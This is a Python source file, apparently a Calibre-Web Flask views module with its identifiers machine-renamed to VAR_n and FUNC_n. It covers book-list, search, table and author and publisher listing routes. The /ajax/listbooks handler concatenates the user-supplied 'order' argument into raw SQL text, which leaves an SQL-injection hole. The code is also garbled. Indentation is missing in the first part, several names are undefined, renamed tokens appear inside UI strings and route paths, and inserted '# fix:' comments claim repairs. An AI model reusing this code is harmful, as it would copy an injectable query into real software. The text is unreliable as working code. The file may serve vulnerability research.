names=VAR_7(tf.getnames())
extract = lambda VAR_9: tf.extractfile(names[VAR_9]).read()
else:
VAR_3.error('unsupported comic format')
return "", 204
if sys.version_info.major >= 3:
b64 = codecs.encode(extract(VAR_9), 'base64').decode()
else:
b64 = extract(VAR_9).encode('base64')
ext = names[VAR_9].rpartition('.')[-1]
if ext not in ('png', 'gif', 'jpg', 'jpeg', 'webp'):
ext = 'png'
extractedfile="data:image/" + ext + ";base64," + b64
fileData={"name": names[VAR_9], "page":VAR_9, "last":len(names)-1, "content": extractedfile}
return make_response(json.dumps(fileData))
return "", 204
'''
@VAR_2.route("/get_authors_json", methods=['GET'])
@login_required_if_no_ano
def FUNC_8():
return calibre_db.get_typeahead(db.Authors, request.args.get('q'), ('|', ','))
@VAR_2.route("/get_publishers_json", methods=['GET'])
@login_required_if_no_ano
def FUNC_9():
return calibre_db.get_typeahead(db.Publishers, request.args.get('q'), ('|', ','))
@VAR_2.route("/get_tags_json", methods=['GET'])
@login_required_if_no_ano
def FUNC_10():
return calibre_db.get_typeahead(db.Tags, request.args.get('q'), tag_filter=tags_filters())
@VAR_2.route("/get_series_json", methods=['GET'])
@login_required_if_no_ano
def FUNC_11():
return calibre_db.get_typeahead(db.Series, request.args.get('q'))
@VAR_2.route("/get_languages_json", methods=['GET'])
@login_required_if_no_ano
def FUNC_12():
VAR_56 = (request.args.get('q') or '').lower()
VAR_57 = isoLanguages.get_language_names(get_locale())
VAR_58 = [s for key, s in VAR_57.items() if s.lower().startswith(VAR_56.lower())]
if len(VAR_58) < 5:
VAR_63 = [s for key, s in VAR_57.items() if VAR_56 in s.lower()]
VAR_58.extend(VAR_63[0:(5 - len(VAR_58))])
entries_start = list(set(VAR_58))
VAR_59 = json.dumps([dict(VAR_13=r) for r in VAR_58[0:5]])
return VAR_59
@VAR_2.route("/get_matching_tags", methods=['GET'])
@login_required_if_no_ano
def FUNC_13():
VAR_60 = {'tags': []}
VAR_21 = calibre_db.session.query(db.Books).filter(calibre_db.common_filters(True))
calibre_db.session.connection().connection.connection.create_function("lower", 1, db.lcase)
VAR_61 = request.args.get('author_name') or ''
VAR_62 = request.args.get('book_title') or ''
VAR_29 = request.args.getlist('include_tag') or ''
VAR_30 = request.args.getlist('exclude_tag') or ''
VAR_21 = q.filter(db.Books.authors.any(func.lower(db.Authors.name).ilike("%" + VAR_61 + "%")),
func.lower(db.Books.title).ilike("%" + VAR_62 + "%"))
if len(VAR_29) > 0:
for tag in VAR_29:
VAR_21 = q.filter(db.Books.tags.any(db.Tags.id == tag))
if len(VAR_30) > 0:
for tag in VAR_30:
VAR_21 = q.filter(not_(db.Books.tags.any(db.Tags.id == tag)))
for VAR_95 in VAR_21:
for tag in VAR_95.tags:
if tag.id not in VAR_60['tags']:
VAR_60['tags'].append(tag.id)
VAR_59 = json.dumps(VAR_60)
return VAR_59
def FUNC_14(VAR_7, VAR_8):
    """Resolve a sort-key name into a SQLAlchemy order_by list.

    'stored' loads the previously saved sorting for view VAR_8; any other
    value is persisted as the new stored sorting. Unrecognized keys fall
    back to newest-first (timestamp descending).
    """
    if VAR_7 == 'stored':
        VAR_7 = VAR_87.get_view_property(VAR_8, 'stored')
    else:
        VAR_87.set_view_property(VAR_8, 'stored', VAR_7)
    VAR_151 = {
        'pubnew': [db.Books.pubdate.desc()],
        'pubold': [db.Books.pubdate],
        'abc': [db.Books.sort],
        'zyx': [db.Books.sort.desc()],
        'new': [db.Books.timestamp.desc()],
        'old': [db.Books.timestamp],
        'authaz': [db.Books.author_sort.asc(), db.Series.name, db.Books.series_index],
        'authza': [db.Books.author_sort.desc(), db.Series.name.desc(), db.Books.series_index.desc()],
        'seriesasc': [db.Books.series_index.asc()],
        'seriesdesc': [db.Books.series_index.desc()],
    }
    return VAR_151.get(VAR_7, [db.Books.timestamp.desc()])
def FUNC_15(VAR_8, VAR_7, VAR_5, VAR_9):
    """Dispatch a book-list request for view type VAR_8 to its renderer.

    VAR_7 is the requested sort key, VAR_5 an optional entity id (author,
    series, ...) and VAR_9 the page number.
    """
    VAR_10 = FUNC_14(VAR_7, VAR_8)
    if VAR_8 == "rated":
        return FUNC_16(VAR_9, VAR_5, VAR_10=VAR_10)  # fix: was the undefined name "order"
    elif VAR_8 == "discover":
        return FUNC_17(VAR_9, VAR_5)
    elif VAR_8 == "unread":
        return FUNC_27(VAR_9, False, VAR_10=VAR_10)  # fix: was "order"
    elif VAR_8 == "read":
        return FUNC_27(VAR_9, True, VAR_10=VAR_10)   # fix: was "order"
    elif VAR_8 == "hot":
        return FUNC_18(VAR_9)
    elif VAR_8 == "download":
        return FUNC_19(VAR_9, VAR_10, VAR_5)
    elif VAR_8 == "author":
        return FUNC_20(VAR_9, VAR_5, VAR_10)
    elif VAR_8 == "publisher":
        return FUNC_21(VAR_9, VAR_5, VAR_10)
    elif VAR_8 == "series":
        return FUNC_22(VAR_9, VAR_5, VAR_10)
    elif VAR_8 == "ratings":
        return FUNC_23(VAR_9, VAR_5, VAR_10)
    elif VAR_8 == "formats":
        return FUNC_24(VAR_9, VAR_5, VAR_10)
    elif VAR_8 == "category":
        return FUNC_25(VAR_9, VAR_5, VAR_10)
    elif VAR_8 == "language":
        return FUNC_26(VAR_9, VAR_5, VAR_10)
    elif VAR_8 == "archived":
        return FUNC_28(VAR_9, VAR_10)
    elif VAR_8 == "search":
        VAR_17 = (request.args.get('query') or '')
        VAR_18 = int(int(config.config_books_per_page) * (VAR_9 - 1))
        return FUNC_30(VAR_17, VAR_18, VAR_10, config.config_books_per_page)
    elif VAR_8 == "advsearch":
        VAR_17 = json.loads(VAR_91['query'])
        VAR_18 = int(int(config.config_books_per_page) * (VAR_9 - 1))
        return FUNC_57(VAR_17, VAR_18, VAR_10, config.config_books_per_page)
    else:
        VAR_150 = VAR_8 or "newest"
        VAR_63, VAR_68, VAR_65 = calibre_db.fill_indexpage(VAR_9, 0, db.Books, True, VAR_10,
                                                           db.books_series_link,
                                                           db.Books.id == db.books_series_link.c.book,
                                                           db.Series)
        # fix: pass the locals (keyword values were the undefined/shadowed
        # names "random" and "pagination")
        return render_title_template('index.html', VAR_68=VAR_68, VAR_63=VAR_63, VAR_65=VAR_65,
                                     VAR_149=_(u"Books"), VAR_9=VAR_150)
def FUNC_16(VAR_9, VAR_5, VAR_10):
    """Render the "Top Rated" list (stored rating > 9, i.e. > 4.5 stars), or 404 if hidden."""
    if VAR_87.check_visibility(constants.SIDEBAR_BEST_RATED):
        VAR_63, VAR_68, VAR_65 = calibre_db.fill_indexpage(VAR_9, 0,
                                                           db.Books,
                                                           db.Books.ratings.any(db.Ratings.rating > 9),
                                                           VAR_10,
                                                           db.books_series_link,
                                                           db.Books.id == db.books_series_link.c.book,
                                                           db.Series)
        # fix: pass the locals (were the undefined names "random"/"pagination")
        return render_title_template('index.html', VAR_68=VAR_68, VAR_63=VAR_63, VAR_65=VAR_65,
                                     id=VAR_5, VAR_149=_(u"Top Rated Books"), VAR_9="rated")
    else:
        abort(404)
def FUNC_17(VAR_9, VAR_5):
    """Render the "Discover" page with a random selection of books, or 404 if hidden."""
    if VAR_87.check_visibility(constants.SIDEBAR_RANDOM):
        VAR_63, VAR_64, VAR_65 = calibre_db.fill_indexpage(VAR_9, 0, db.Books, True, [func.randomblob(2)])
        VAR_65 = Pagination(1, config.config_books_per_page, config.config_books_per_page)
        # fix: pass the local pagination object (was the undefined name "pagination")
        return render_title_template('discover.html', VAR_63=VAR_63, VAR_65=VAR_65, id=VAR_5,
                                     VAR_149=_(u"Discover (Random Books)"), VAR_9="discover")
    else:
        abort(404)
def FUNC_18(VAR_9):
    """Render the "Hot Books" list ordered by download count, or 404 if hidden.

    Download entries pointing at books that no longer pass the common filters
    are pruned as a side effect.
    """
    if VAR_87.check_visibility(constants.SIDEBAR_HOT):
        if VAR_87.show_detail_random():
            VAR_68 = calibre_db.session.query(db.Books).filter(calibre_db.common_filters()) \
                .order_by(func.random()).limit(config.config_random_books)
        else:
            VAR_68 = false()
        VAR_79 = int(int(config.config_books_per_page) * (VAR_9 - 1))
        VAR_101 = ub.session.query(ub.Downloads, func.count(ub.Downloads.book_id)).order_by(
            func.count(ub.Downloads.book_id).desc()).group_by(ub.Downloads.book_id)
        VAR_102 = VAR_101.offset(VAR_79).limit(config.config_books_per_page)
        VAR_63 = list()
        for VAR_95 in VAR_102:
            VAR_125 = calibre_db.session.query(db.Books).filter(calibre_db.common_filters()).filter(
                db.Books.id == VAR_95.Downloads.book_id).first()
            if VAR_125:
                VAR_63.append(VAR_125)
            else:
                # Stale download record: the book is gone or filtered out.
                ub.delete_download(VAR_95.Downloads.book_id)
        VAR_103 = VAR_63.__len__()
        VAR_65 = Pagination(VAR_9, config.config_books_per_page, VAR_103)
        # fix: pass the locals (were the undefined names "random"/"pagination")
        return render_title_template('index.html', VAR_68=VAR_68, VAR_63=VAR_63, VAR_65=VAR_65,
                                     VAR_149=_(u"Hot Books (Most Downloaded)"), VAR_9="hot")
    else:
        abort(404)
def FUNC_19(VAR_9, VAR_10, VAR_11):
    """Render the books downloaded by a user (admins may view any user), or 404 if hidden."""
    if VAR_87.role_admin():
        VAR_11 = int(VAR_11)
    else:
        # Non-admins can only ever see their own downloads.
        VAR_11 = VAR_87.id
    if VAR_87.check_visibility(constants.SIDEBAR_DOWNLOAD):
        if VAR_87.show_detail_random():
            VAR_68 = calibre_db.session.query(db.Books).filter(calibre_db.common_filters()) \
                .order_by(func.random()).limit(config.config_random_books)
        else:
            VAR_68 = false()
        VAR_63, VAR_64, VAR_65 = calibre_db.fill_indexpage(VAR_9,
                                                           0,
                                                           db.Books,
                                                           ub.Downloads.user_id == VAR_11,
                                                           VAR_10,
                                                           ub.Downloads, db.Books.id == ub.Downloads.book_id)
        for VAR_95 in VAR_63:
            if not calibre_db.session.query(db.Books).filter(calibre_db.common_filters()) \
                    .filter(db.Books.id == VAR_95.id).first():
                # Prune download records whose book no longer exists.
                ub.delete_download(VAR_95.id)
        VAR_104 = ub.session.query(ub.User).filter(ub.User.id == VAR_11).first()
        # fix: pass the locals (were the undefined names "random"/"pagination")
        return render_title_template('index.html',
                                     VAR_68=VAR_68,
                                     VAR_63=VAR_63,
                                     VAR_65=VAR_65,
                                     id=VAR_11,
                                     VAR_149=_(u"Downloaded VAR_127 by %(VAR_104)s",VAR_104=VAR_104.name),
                                     VAR_9="download")
    else:
        abort(404)
def FUNC_20(VAR_9, VAR_12, VAR_10):
    """Render the book list of a single author, optionally enriched with
    Goodreads author info and further books."""
    VAR_63, VAR_64, VAR_65 = calibre_db.fill_indexpage(VAR_9, 0,
                                                       db.Books,
                                                       db.Books.authors.any(db.Authors.id == VAR_12),
                                                       [VAR_10[0], db.Series.name, db.Books.series_index],
                                                       db.books_series_link,
                                                       db.Books.id == db.books_series_link.c.book,
                                                       db.Series)
    if VAR_63 is None or not len(VAR_63):
        flash(_(u"Oops! Selected VAR_95 VAR_149 is unavailable. File does not exist or is not accessible"),
              category="error")
        return redirect(url_for("web.index"))
    if constants.sqlalchemy_version2:
        VAR_105 = calibre_db.session.get(db.Authors, VAR_12)
    else:
        VAR_105 = calibre_db.session.query(db.Authors).get(VAR_12)
    VAR_36 = VAR_105.name.replace('|', ',')
    VAR_66 = None
    VAR_67 = []
    if services.goodreads_support and config.config_use_goodreads:
        VAR_66 = services.goodreads_support.get_author_info(VAR_36)
        VAR_67 = services.goodreads_support.get_other_books(VAR_66, VAR_63)
    # fix: pass the locals (were the undefined names "pagination"/"other_books")
    return render_title_template('author.html', VAR_63=VAR_63, VAR_65=VAR_65, id=VAR_12,
                                 VAR_149=_(u"Author: %(VAR_13)s", VAR_13=VAR_36), VAR_105=VAR_66,
                                 VAR_67=VAR_67, VAR_9="author")
def FUNC_21(VAR_9, VAR_5, VAR_10):
    """Render the book list of a single publisher, or 404 if it does not exist."""
    VAR_38 = calibre_db.session.query(db.Publishers).filter(db.Publishers.id == VAR_5).first()
    if VAR_38:
        VAR_63, VAR_68, VAR_65 = calibre_db.fill_indexpage(VAR_9, 0,
                                                           db.Books,
                                                           db.Books.publishers.any(db.Publishers.id == VAR_5),
                                                           [db.Series.name, VAR_10[0], db.Books.series_index],
                                                           db.books_series_link,
                                                           db.Books.id == db.books_series_link.c.book,
                                                           db.Series)
        # fix: pass the locals (were the undefined names "random"/"pagination")
        return render_title_template('index.html', VAR_68=VAR_68, VAR_63=VAR_63, VAR_65=VAR_65, id=VAR_5,
                                     VAR_149=_(u"Publisher: %(VAR_13)s", VAR_13=VAR_38.name), VAR_9="publisher")
    else:
        abort(404)
def FUNC_22(VAR_9, VAR_5, VAR_10):
    """Render the book list of a single series, or 404 if it does not exist."""
    VAR_13 = calibre_db.session.query(db.Series).filter(db.Series.id == VAR_5).first()
    if VAR_13:
        VAR_63, VAR_68, VAR_65 = calibre_db.fill_indexpage(VAR_9, 0,
                                                           db.Books,
                                                           db.Books.series.any(db.Series.id == VAR_5),
                                                           [VAR_10[0]])
        # fix: pass the locals (were the undefined names "random"/"pagination")
        return render_title_template('index.html', VAR_68=VAR_68, VAR_65=VAR_65, VAR_63=VAR_63, id=VAR_5,
                                     VAR_149=_(u"Series: %(serie)s", serie=VAR_13.name), VAR_9="series")
    else:
        abort(404)
def FUNC_23(VAR_9, VAR_5, VAR_10):
    """Render the book list for a single rating value, or 404 for unknown/invalid ratings."""
    VAR_13 = calibre_db.session.query(db.Ratings).filter(db.Ratings.id == VAR_5).first()
    VAR_63, VAR_68, VAR_65 = calibre_db.fill_indexpage(VAR_9, 0,
                                                       db.Books,
                                                       db.Books.ratings.any(db.Ratings.id == VAR_5),
                                                       [VAR_10[0]])
    if VAR_13 and VAR_13.rating <= 10:
        # fix: pass the locals (were the undefined names "random"/"pagination")
        return render_title_template('index.html', VAR_68=VAR_68, VAR_65=VAR_65, VAR_63=VAR_63, id=VAR_5,
                                     VAR_149=_(u"Rating: %(rating)s stars", rating=int(VAR_13.rating / 2)), VAR_9="ratings")
    else:
        abort(404)
def FUNC_24(VAR_9, VAR_5, VAR_10):
    """Render the book list for a single file format, or 404 if none exists."""
    VAR_13 = calibre_db.session.query(db.Data).filter(db.Data.format == VAR_5.upper()).first()
    if VAR_13:
        VAR_63, VAR_68, VAR_65 = calibre_db.fill_indexpage(VAR_9, 0,
                                                           db.Books,
                                                           db.Books.data.any(db.Data.format == VAR_5.upper()),
                                                           [VAR_10[0]])
        # fix: pass the locals (were the undefined names "random"/"pagination")
        return render_title_template('index.html', VAR_68=VAR_68, VAR_65=VAR_65, VAR_63=VAR_63, id=VAR_5,
                                     VAR_149=_(u"File format: %(format)s", format=VAR_13.format), VAR_9="formats")
    else:
        abort(404)
def FUNC_25(VAR_9, VAR_5, VAR_10):
    """Render the book list for a single tag/category, or 404 if it does not exist."""
    VAR_13 = calibre_db.session.query(db.Tags).filter(db.Tags.id == VAR_5).first()
    if VAR_13:
        VAR_63, VAR_68, VAR_65 = calibre_db.fill_indexpage(VAR_9, 0,
                                                           db.Books,
                                                           db.Books.tags.any(db.Tags.id == VAR_5),
                                                           [VAR_10[0], db.Series.name, db.Books.series_index],
                                                           db.books_series_link,
                                                           db.Books.id == db.books_series_link.c.book,
                                                           db.Series)
        # fix: pass the locals (were the undefined names "random"/"pagination")
        return render_title_template('index.html', VAR_68=VAR_68, VAR_63=VAR_63, VAR_65=VAR_65, id=VAR_5,
                                     VAR_149=_(u"Category: %(VAR_13)s", VAR_13=VAR_13.name), VAR_9="category")
    else:
        abort(404)
def FUNC_26(VAR_9, VAR_13, VAR_10):
    """Render the book list for a single language code, or 404 for unknown codes."""
    try:
        VAR_106 = isoLanguages.get_language_name(get_locale(), VAR_13)
    except KeyError:
        abort(404)
    VAR_63, VAR_68, VAR_65 = calibre_db.fill_indexpage(VAR_9, 0,
                                                       db.Books,
                                                       db.Books.languages.any(db.Languages.lang_code == VAR_13),
                                                       [VAR_10[0]])
    # fix: pass the locals (were the undefined names "random"/"pagination")
    return render_title_template('index.html', VAR_68=VAR_68, VAR_63=VAR_63, VAR_65=VAR_65, id=VAR_13,
                                 VAR_149=_(u"Language: %(VAR_13)s", VAR_13=VAR_106), VAR_9="language")
def FUNC_27(VAR_9, VAR_14, VAR_15=False, VAR_10=None):
    """Render (or, with VAR_15 set, just return) the read/unread book list.

    VAR_14 selects read (True) or unread (False) books; the read state comes
    either from the builtin ReadBook table or from a configured custom column.
    """
    VAR_10 = VAR_10 or []
    if not config.config_read_column:
        if VAR_14:
            VAR_126 = and_(ub.ReadBook.user_id == int(VAR_87.id),
                           ub.ReadBook.read_status == ub.ReadBook.STATUS_FINISHED)
        else:
            # coalesce: rows with no ReadBook entry count as unread
            VAR_126 = coalesce(ub.ReadBook.read_status, 0) != ub.ReadBook.STATUS_FINISHED
        VAR_63, VAR_68, VAR_65 = calibre_db.fill_indexpage(VAR_9, 0,
                                                           db.Books,
                                                           VAR_126,
                                                           VAR_10,
                                                           db.books_series_link,
                                                           db.Books.id == db.books_series_link.c.book,
                                                           db.Series,
                                                           ub.ReadBook, db.Books.id == ub.ReadBook.book_id)
    else:
        try:
            if VAR_14:
                VAR_126 = db.cc_classes[config.config_read_column].value == True
            else:
                VAR_126 = coalesce(db.cc_classes[config.config_read_column].value, False) != True
            VAR_63, VAR_68, VAR_65 = calibre_db.fill_indexpage(VAR_9, 0,
                                                               db.Books,
                                                               VAR_126,
                                                               VAR_10,
                                                               db.books_series_link,
                                                               db.Books.id == db.books_series_link.c.book,
                                                               db.Series,
                                                               db.cc_classes[config.config_read_column])
        except (KeyError, AttributeError):
            VAR_3.error("Custom Column No.%d is not existing in calibre database", config.config_read_column)
            if not VAR_15:
                flash(_("Custom Column No.%(column)d is not existing in calibre database",
                        column=config.config_read_column),
                      category="error")
                return redirect(url_for("web.index"))
    if VAR_15:
        return VAR_63, VAR_65
    else:
        if VAR_14:
            VAR_13 = _(u'Read Books') + ' (' + str(VAR_65.total_count) + ')'
            VAR_72 = "read"
        else:
            VAR_13 = _(u'Unread Books') + ' (' + str(VAR_65.total_count) + ')'
            VAR_72 = "unread"
        # fix: pass the locals (were the undefined names "random"/"pagination")
        return render_title_template('index.html', VAR_68=VAR_68, VAR_63=VAR_63, VAR_65=VAR_65,
                                     VAR_149=VAR_13, VAR_9=VAR_72)
def FUNC_28(VAR_9, VAR_10):
    """Render the current user's archived books."""
    VAR_10 = VAR_10 or []
    VAR_69 = (
        ub.session.query(ub.ArchivedBook)
        .filter(ub.ArchivedBook.user_id == int(VAR_87.id))
        .filter(ub.ArchivedBook.is_archived == True)
        .all()
    )
    VAR_70 = [VAR_54.book_id for VAR_54 in VAR_69]
    VAR_71 = db.Books.id.in_(VAR_70)
    VAR_63, VAR_68, VAR_65 = calibre_db.fill_indexpage_with_archived_books(VAR_9, 0,
                                                                           db.Books,
                                                                           VAR_71,
                                                                           VAR_10,
                                                                           allow_show_archived=True)
    VAR_13 = _(u'Archived Books') + ' (' + str(len(VAR_70)) + ')'
    VAR_72 = "archived"
    # fix: pass the locals (were the undefined names "random"/"pagination")
    return render_title_template('index.html', VAR_68=VAR_68, VAR_63=VAR_63, VAR_65=VAR_65,
                                 VAR_149=VAR_13, VAR_9=VAR_72)
def FUNC_29(VAR_16):
    """Render the advanced-search form populated with all selectable tags,
    series, shelves, file formats and (when unrestricted) languages."""
    VAR_41 = calibre_db.session.query(db.Tags)\
        .join(db.books_tags_link)\
        .join(db.Books)\
        .filter(calibre_db.common_filters()) \
        .group_by(text('books_tags_link.tag'))\
        .order_by(db.Tags.name).all()
    VAR_73 = calibre_db.session.query(db.Series)\
        .join(db.books_series_link)\
        .join(db.Books)\
        .filter(calibre_db.common_filters()) \
        .group_by(text('books_series_link.series'))\
        .order_by(db.Series.name)\
        .filter(calibre_db.common_filters()).all()
    VAR_74 = ub.session.query(ub.Shelf)\
        .filter(or_(ub.Shelf.is_public == 1, ub.Shelf.user_id == int(VAR_87.id)))\
        .order_by(ub.Shelf.name).all()
    VAR_75 = calibre_db.session.query(db.Data)\
        .join(db.Books)\
        .filter(calibre_db.common_filters()) \
        .group_by(db.Data.format)\
        .order_by(db.Data.format).all()
    if VAR_87.filter_language() == u"all":
        VAR_48 = calibre_db.speaking_language()
    else:
        VAR_48 = None
    # fix: pass the query results (keyword values were the undefined names
    # "tags"/"languages"/"extensions"/"series"/"shelves"/"cc")
    return render_title_template('search_form.html', VAR_41=VAR_41, VAR_48=VAR_48, VAR_75=VAR_75,
                                 VAR_73=VAR_73, VAR_74=VAR_74, VAR_149=_(u"Advanced Search"), VAR_16=VAR_16, VAR_9="advsearch")
def FUNC_30(VAR_17, VAR_18=None, VAR_10=None, VAR_19=None):
    """Run a plain search for VAR_17 and render the result page."""
    VAR_76 = db.books_series_link, db.Books.id == db.books_series_link.c.book, db.Series
    VAR_63, VAR_77, VAR_65 = calibre_db.get_search_results(VAR_17, VAR_18, VAR_10, VAR_19, *VAR_76)
    # fix: pass the locals (keyword values were the undefined names
    # "pagination"/"entries"/"result_count")
    return render_title_template('search.html',
                                 VAR_35=VAR_17,
                                 VAR_65=VAR_65,
                                 VAR_56=VAR_17,
                                 adv_searchterm=VAR_17,
                                 VAR_63=VAR_63,
                                 VAR_77=VAR_77,
                                 VAR_149=_(u"Search"),
                                 VAR_9="search")
@VAR_2.route("/", defaults={'page': 1})
@VAR_2.route('/VAR_9/<int:VAR_9>')
@login_required_if_no_ano
def FUNC_31(VAR_9):
    """Front page: the "newest" book list, sorted per query arg or stored sort."""
    VAR_20 = request.args.get('sort') or 'stored'
    return FUNC_15("newest", VAR_20.lower(), 1, VAR_9)
@VAR_2.route('/<VAR_8>/<VAR_20>', defaults={'page': 1, 'book_id': 1})
@VAR_2.route('/<VAR_8>/<VAR_20>/', defaults={'page': 1, 'book_id': 1})
@VAR_2.route('/<VAR_8>/<VAR_20>/<VAR_5>', defaults={'page': 1})
@VAR_2.route('/<VAR_8>/<VAR_20>/<VAR_5>/<int:VAR_9>')
@login_required_if_no_ano
def FUNC_32(VAR_8, VAR_20, VAR_5, VAR_9):
    # Generic book-list route: delegates to the dispatcher with view type
    # VAR_8, sort key VAR_20, entity id VAR_5 and page number VAR_9.
    return FUNC_15(VAR_8, VAR_20, VAR_5, VAR_9)
@VAR_2.route("/table")
@login_required
def FUNC_33():
    """Render the book table view using the user's stored column-visibility settings."""
    return render_title_template('book_table.html', VAR_149=_(u"Books List"), VAR_9="book_table",
                                 visiblility=VAR_87.view_settings.get('table', {}))
@VAR_2.route("/ajax/listbooks")
@login_required
def FUNC_34():
    """Serve the paged/sorted/filtered book rows for the table view as JSON.

    Supports offset/limit paging, free-text search, checkbox ("state")
    selection sorting, and sorting by linked entities (tags, series,
    publishers, authors, languages).
    """
    VAR_79 = int(request.args.get("offset") or 0)
    VAR_19 = int(request.args.get("limit") or config.config_books_per_page)
    VAR_80 = request.args.get("search")
    VAR_7 = request.args.get("sort", "id")
    VAR_10 = request.args.get("order", "").lower()
    VAR_81 = None
    VAR_76 = tuple()
    if VAR_7 == "state":
        # "state" sorting orders by the checkbox selection posted by the client.
        VAR_81 = json.loads(request.args.get("state", "[]"))
    elif VAR_7 == "tags":
        VAR_10 = [db.Tags.name.asc()] if VAR_10 == "asc" else [db.Tags.name.desc()]
        VAR_76 = db.books_tags_link,db.Books.id == db.books_tags_link.c.book, db.Tags
    elif VAR_7 == "series":
        VAR_10 = [db.Series.name.asc()] if VAR_10 == "asc" else [db.Series.name.desc()]
        VAR_76 = db.books_series_link,db.Books.id == db.books_series_link.c.book, db.Series
    elif VAR_7 == "publishers":
        VAR_10 = [db.Publishers.name.asc()] if VAR_10 == "asc" else [db.Publishers.name.desc()]
        VAR_76 = db.books_publishers_link,db.Books.id == db.books_publishers_link.c.book, db.Publishers
    elif VAR_7 == "authors":
        VAR_10 = [db.Authors.name.asc(), db.Series.name, db.Books.series_index] if VAR_10 == "asc" \
            else [db.Authors.name.desc(), db.Series.name.desc(), db.Books.series_index.desc()]
        VAR_76 = db.books_authors_link, db.Books.id == db.books_authors_link.c.book, db.Authors, \
            db.books_series_link, db.Books.id == db.books_series_link.c.book, db.Series
    elif VAR_7 == "languages":
        VAR_10 = [db.Languages.lang_code.asc()] if VAR_10 == "asc" else [db.Languages.lang_code.desc()]
        VAR_76 = db.books_languages_link, db.Books.id == db.books_languages_link.c.book, db.Languages
    elif VAR_10 and VAR_7 in ["sort", "title", "authors_sort", "series_index"]:
        # Plain book column: sort by raw SQL text "<column> <direction>".
        VAR_10 = [text(VAR_7 + " " + VAR_10)]
    elif not VAR_81:
        VAR_10 = [db.Books.timestamp.desc()]
    VAR_82 = VAR_83 = calibre_db.session.query(db.Books).count()
    if VAR_81:
        if VAR_80:
            VAR_127 = calibre_db.search_query(VAR_80).all()
            VAR_83 = len(VAR_127)
        else:
            VAR_127 = calibre_db.session.query(db.Books).filter(calibre_db.common_filters()).all()
        VAR_63 = calibre_db.get_checkbox_sorted(VAR_127, VAR_81, VAR_79, VAR_19, VAR_10)
    elif VAR_80:
        VAR_63, VAR_83, VAR_64 = calibre_db.get_search_results(VAR_80, VAR_79, VAR_10, VAR_19, *VAR_76)
    else:
        VAR_63, VAR_64, VAR_64 = calibre_db.fill_indexpage((int(VAR_79) / (int(VAR_19)) + 1), VAR_19, db.Books, True, VAR_10, *VAR_76)
    # Localize the language names of every returned book for display.
    for entry in VAR_63:
        for FUNC_31 in range(0, len(entry.languages)):
            entry.languages[FUNC_31].language_name = isoLanguages.get_language_name(get_locale(), entry.languages[
                FUNC_31].lang_code)
    VAR_84 = {'totalNotFiltered': VAR_82, 'total': VAR_83, "rows": VAR_63}
    VAR_85 = json.dumps(VAR_84, cls=db.AlchemyEncoder)
    VAR_86 = make_response(VAR_85)
    VAR_86.headers["Content-Type"] = "application/json; charset=utf-8"
    return VAR_86
@VAR_2.route("/ajax/table_settings", methods=['POST'])
@login_required
def FUNC_35():
    # Persist the posted book-table column visibility settings for the user.
    VAR_87.view_settings['table'] = json.loads(request.data)
    try:
        try:
            # flag_modified is needed so SQLAlchemy notices the in-place
            # mutation of the JSON column; anonymous users lack the attribute.
            flag_modified(VAR_87, "view_settings")
        except AttributeError:
            pass
        ub.session.commit()
    except (InvalidRequestError, OperationalError):
        VAR_3.error("Invalid request received: %r ", request, )
        return "Invalid request", 400
    return ""
@VAR_2.route("/author")
@login_required_if_no_ano
def FUNC_36():
    """List all authors with their book counts and a letter index, or 404 if hidden."""
    if VAR_87.check_visibility(constants.SIDEBAR_AUTHOR):
        if VAR_87.get_view_property('author', 'dir') == 'desc':
            VAR_10 = db.Authors.sort.desc()
            VAR_109 = 0
        else:
            VAR_10 = db.Authors.sort.asc()
            VAR_109 = 1
        VAR_63 = calibre_db.session.query(db.Authors, func.count('books_authors_link.book').label('count')) \
            .join(db.books_authors_link).join(db.Books).filter(calibre_db.common_filters()) \
            .group_by(text('books_authors_link.author')).order_by(VAR_10).all()
        VAR_107 = calibre_db.session.query(func.upper(func.substr(db.Authors.sort, 1, 1)).label('char')) \
            .join(db.books_authors_link).join(db.Books).filter(calibre_db.common_filters()) \
            .group_by(func.upper(func.substr(db.Authors.sort, 1, 1))).all()
        # Deep copy so the display-name tweak does not mutate the ORM objects.
        VAR_108 = copy.deepcopy(VAR_63)
        for entry in VAR_108:
            entry.Authors.name = entry.Authors.name.replace('|', ',')
        # fix: pass the computed letter list (was the undefined name "charlist")
        return render_title_template('list.html', VAR_63=VAR_108, folder='web.books_list', VAR_107=VAR_107,
                                     VAR_149=u"Authors", VAR_9="authorlist", VAR_8='author', VAR_10=VAR_109)
    else:
        abort(404)
@VAR_2.route("/downloadlist")
@login_required_if_no_ano
def FUNC_37():
    """List users with their download counts (admin only), or 404."""
    if VAR_87.get_view_property('download', 'dir') == 'desc':
        VAR_10 = ub.User.name.desc()
        VAR_109 = 0
    else:
        VAR_10 = ub.User.name.asc()
        VAR_109 = 1
    if VAR_87.check_visibility(constants.SIDEBAR_DOWNLOAD) and VAR_87.role_admin():
        VAR_63 = ub.session.query(ub.User, func.count(ub.Downloads.book_id).label('count'))\
            .join(ub.Downloads).group_by(ub.Downloads.user_id).order_by(VAR_10).all()
        VAR_107 = ub.session.query(func.upper(func.substr(ub.User.name, 1, 1)).label('char')) \
            .filter(ub.User.role.op('&')(constants.ROLE_ANONYMOUS) != constants.ROLE_ANONYMOUS) \
            .group_by(func.upper(func.substr(ub.User.name, 1, 1))).all()
        # fix: pass the computed letter list (was the undefined name "charlist")
        return render_title_template('list.html', VAR_63=VAR_63, folder='web.books_list', VAR_107=VAR_107,
                                     VAR_149=_(u"Downloads"), VAR_9="downloadlist", VAR_8="download", VAR_10=VAR_109)
    else:
        abort(404)
@VAR_2.route("/publisher")
@login_required_if_no_ano
def FUNC_38():
    """List all publishers with their book counts and a letter index, or 404 if hidden."""
    if VAR_87.get_view_property('publisher', 'dir') == 'desc':
        VAR_10 = db.Publishers.name.desc()
        VAR_109 = 0
    else:
        VAR_10 = db.Publishers.name.asc()
        VAR_109 = 1
    if VAR_87.check_visibility(constants.SIDEBAR_PUBLISHER):
        VAR_63 = calibre_db.session.query(db.Publishers, func.count('books_publishers_link.book').label('count')) \
            .join(db.books_publishers_link).join(db.Books).filter(calibre_db.common_filters()) \
            .group_by(text('books_publishers_link.publisher')).order_by(VAR_10).all()
        VAR_107 = calibre_db.session.query(func.upper(func.substr(db.Publishers.name, 1, 1)).label('char')) \
            .join(db.books_publishers_link).join(db.Books).filter(calibre_db.common_filters()) \
            .group_by(func.upper(func.substr(db.Publishers.name, 1, 1))).all()
        # fix: pass the computed letter list (was the undefined name "charlist")
        return render_title_template('list.html', VAR_63=VAR_63, folder='web.books_list', VAR_107=VAR_107,
